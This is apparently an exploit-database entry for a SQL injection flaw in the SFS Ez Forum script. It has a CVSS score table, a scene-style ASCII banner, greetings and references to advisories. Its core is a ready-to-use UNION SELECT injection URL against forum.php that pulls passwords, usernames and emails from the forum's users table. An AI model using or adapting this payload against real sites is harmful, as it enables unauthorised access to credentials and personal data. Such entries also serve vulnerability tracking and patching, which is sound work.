SFS Ez Forum (forum.php id) SQL Injection Vulnerability
| Published | Credit |
Risk |
| 2008.10.29 |
Hurley |
Medium |
| CVSS Base Score |
Impact Subscore |
| Exploitability Subscore |
| 5.8/10 |
6.4/10 |
| 6.5/10 |
| Exploit range |
Attack complexity |
| Authentication |
| Adjacent network |
Low |
| No required |
| Confidentiality impact |
Integrity impact |
| Availability impact |
| Partial |
Partial |
| Partial |
==================================================================================
SFS Forum (forum.php id) Remote SQL Injection Vulnerability
==================================================================================
__ __ __
/ / / /_ _______/ /__ __ __
/ /_/ / / / / ___/ / _ \/ / / /
/ __ / /_/ / / / / __/ /_/ /
/_/ /_/\__,_/_/ /_/\___/\__, /
/____/
==================================================================================
----------------------------------------------------------------------------------
Website script: http://www.scripts-for-sites.info/index.php
----------------------------------------------------------------------------------
Exploit:
http://localHost/forum/forum.php?forum=-9999+union+all+select+null,concat_ws(0x3a,password,username,%20email),null,null+
from+users/*
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
==================================================================================
Greetz : Boom3rang
Special Thx : Darckc0de
==================================================================================
References:
http://www.securityfocus.com/bid/31924
http://www.milw0rm.com/exploits/6843
http://secunia.com/advisories/32397
ASCII VERSION
|
